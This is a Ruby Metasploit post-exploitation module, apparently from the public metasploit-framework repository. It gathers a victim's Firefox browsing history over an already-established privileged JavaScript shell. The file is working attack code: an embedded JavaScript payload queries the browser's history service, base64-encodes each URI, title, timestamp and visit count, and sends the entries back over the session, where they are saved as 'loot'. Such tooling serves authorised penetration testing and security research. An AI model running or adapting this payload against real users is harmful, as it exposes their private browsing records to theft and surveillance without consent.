GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/firefox/gather/history.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
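class MetasploitModule < Msf::Post
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Post module that collects the browsing history of a Firefox instance over an
  # already-established privileged JavaScript shell session. The mixin above
  # supplies js_exec and the session handling; this class only builds the
  # script, decodes what comes back and stores it.
  #
  # @param info [Hash] module metadata merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox Gather History from Privileged Javascript Shell',
        'Description' => %q{
          This module allows collection of the entire browser history from a Firefox
          Privileged Javascript Shell.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'DisclosureDate' => '2014-04-11'
      )
    )

    # Upper bound on how long the module waits for the script's response.
    register_options([
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
    ])
  end

  # Executes the history-dumping script in the session, decodes the returned
  # entries and writes them to the framework loot store (on the Metasploit
  # host, via store_loot); nothing is written on the target by this method.
  #
  # Every field of every entry arrives base64-encoded (the script encodes them
  # with btoa, presumably so arbitrary titles and URIs survive transport), so
  # each value is decoded before the JSON is saved. When the response is not
  # JSON -- the script's catch block sends the exception back instead of the
  # entry list -- the raw response is printed as a warning rather than dropped.
  #
  # @return [void]
  def run
    results = js_exec(js_payload)
    return unless results.present?

    begin
      history = JSON.parse(results)
      history.each do |entry|
        # Decode in place; transform_values! only rewrites existing keys, so
        # no keys are added or removed while the hash is walked.
        entry.transform_values! { |v| Rex::Text.decode_base64(v) }
      end

      file = store_loot('firefox.history.json', 'text/json', rhost, history.to_json)
      print_good("Saved #{history.length} history entries to #{file}")
    rescue JSON::ParserError
      print_warning(results)
    end
  end

  # JavaScript run inside the browser's privileged shell.
  #
  # It reads history through the browser's own Places history service
  # (nsINavHistoryService) rather than opening any file, walks the root
  # container of an unfiltered query, keeps only URI-type result nodes
  # (RESULT_TYPE_URI), and sends the entries back as a JSON string with each
  # field btoa-encoded. Any exception is caught and passed to send instead, so
  # the Ruby side sees a non-JSON response in that case (see run).
  #
  # @return [String] the script, with surrounding whitespace stripped
  def js_payload
    %|
      (function(send){
        try {
          var service = Components
            .classes["@mozilla.org/browser/nav-history-service;1"]
            .getService(Components.interfaces.nsINavHistoryService);
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;

          var query = service.getNewQuery();
          var options = service.getNewQueryOptions();
          var result = service.executeQuery(query, options);
          var fields = [];
          var entries = [];

          var root = result.root;
          root.containerOpen = true;

          for (var i = 0; i < result.root.childCount; ++i) {
            var child = result.root.getChild(i);
            if (child.type == child.RESULT_TYPE_URI) {
              entries.push({
                uri: b64(child.uri),
                title: b64(child.title),
                time: b64(child.time),
                accessCount: b64(child.accessCount)
              });
            }
          }

          result.root.containerOpen = false;

          send(JSON.stringify(entries));
        } catch (e) {
          send(e);
        }
      })(this.send);
    |.strip
  end
end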